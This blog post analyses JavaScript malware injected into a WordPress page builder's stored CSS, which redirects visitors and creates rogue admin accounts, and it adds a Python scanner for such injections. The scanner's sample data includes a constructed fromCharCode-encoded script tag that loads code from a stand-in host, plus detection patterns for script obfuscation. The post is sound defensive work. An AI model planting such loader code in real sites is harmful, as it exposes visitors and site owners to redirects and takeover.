YourService-Live & AdsNet-Work — Website Redirect-Causing JavaScript

Example of JavaScript malware from a third-party domain adsnet dot work


Recently we had a chance to analyse some malware injected into a database. Malware injected into the database is tricky to catch for several reasons. First, most malware scanners skip the database scan or only support a partial scan of the database. Second, it is not possible to know whether a piece of code in the database is actually malware unless you can decode it or match it against known malware signatures.

The Malicious Code

The following piece of malware code was found in the custom_CSS settings that Bold Builder, a WordPress page builder, stores in the database.

[Image: encoded malware code]

The code would render as-is in the page source on the front end. As you can see, it has two distinct lines.

Here’s what the first line decodes to:

[Image: decoded malware code, first line]

As you can see, it loads JavaScript malware from the third-party domain adsnet dot work.

Here’s what the second line decodes to:

[Image: decoded malware code, second line]

And as you can guess from the behaviour of the previous malware snippet, this one loads JavaScript malware from the third-party domain yourservice dot live.

Symptoms of Malware


Both end up triggering a malicious JavaScript redirect that lands website visitors on rogue sites. Not only that: when a user with administrative privileges tries to access the site, the script creates a new user, giving that illegitimate user privileged access to the site.

One of these scripts also ends up redirecting search bots such as Google. This eventually results in the site being reindexed and a loss of search engine rankings, and thus website traffic.
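The check described earlier, decoding a stored setting before judging it, as an added example (not code from the original article or from Bold Builder). It assumes the obfuscation is HTML entities or `String.fromCharCode`, since the article's encoded sample is not reproduced here; the option names, hosts and payload are constructed.

```python
import html
import re

# Script-capable markers that should never appear in a CSS-only setting.
SCRIPT_MARKERS = re.compile(r"<\s*script|String\.fromCharCode|\beval\s*\(|\batob\s*\(", re.I)
# Assumed encoding: String.fromCharCode(60,115,...) with decimal code points.
CHARCODE_CALL = re.compile(r"String\.fromCharCode\s*\(\s*(\d{1,5}(?:\s*,\s*\d{1,5})*)\s*\)", re.I)
# Host part of absolute or protocol-relative URLs.
HOST = re.compile(r"(?:https?:)?//([a-z0-9.-]+)", re.I)

def decode_layers(value, max_rounds=5):
    """Undo HTML entities and fromCharCode calls until the text stops changing."""
    for _ in range(max_rounds):
        decoded = CHARCODE_CALL.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")),
            html.unescape(value))
        if decoded == value:
            break
        value = decoded
    return value

def external_hosts(text, site_host):
    """Hosts referenced in text other than the site itself or its subdomains."""
    hosts = {h.lower().rstrip(".") for h in HOST.findall(text)}
    return sorted(h for h in hosts
                  if h and h != site_host and not h.endswith("." + site_host))

def scan_options(rows, site_host):
    """Return (option_name, external_hosts) for every row holding script content."""
    findings = []
    for name, raw in rows:
        decoded = decode_layers(raw)
        if SCRIPT_MARKERS.search(raw) or SCRIPT_MARKERS.search(decoded):
            findings.append((name, external_hosts(decoded, site_host)))
    return findings

# Constructed sample rows (option names, hosts and payload are made up).
LOADER = '<script src="//loader.example.invalid/r.js"></script>'
ENCODED = "String.fromCharCode(" + ",".join(str(ord(c)) for c in LOADER) + ")"
SAMPLE_ROWS = [
    ("demo_css_clean", ".hero{background:url(//static.example.org/bg.png)}"),
    ("demo_css_charcode", ".x{color:red}</style><script>document.write(" + ENCODED + ")</script>"),
    ("demo_css_entities", "&#60;script src=&#34;https://cdn.example.invalid/a.js&#34;&#62;&#60;/script&#62;"),
]

if __name__ == "__main__":
    for name, hosts in scan_options(SAMPLE_ROWS, "shop.example.com"):
        print(f"SUSPICIOUS {name}: loads from {hosts or 'inline only'}")
```

On a real site the rows would come from an export of wherever the page builder stores its custom CSS, and any hit is a lead for manual review rather than a verdict.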


This article is written by Evelyn Allison. Evelyn has over two decades of experience with the big-tech corporate giants. Starting in 2002 with consumer IT remote support, she transitioned into IT enterprise support and systems provisioning for Windows and Linux servers. Her prowess spans her expertise in network security, security audit and scripting-based automation. Actively involved in web security since 2017, Evelyn has worked with various technologies to secure the web, leveraging tech like Nginx, modsecurity, reverse proxies, developing web application firewalls, on-the-fly asset optimization using Google’s PageSpeed Module and more. Her expertise is reflected in the top-tier plugins and comprehensive consulting services she offers in the domain of web security.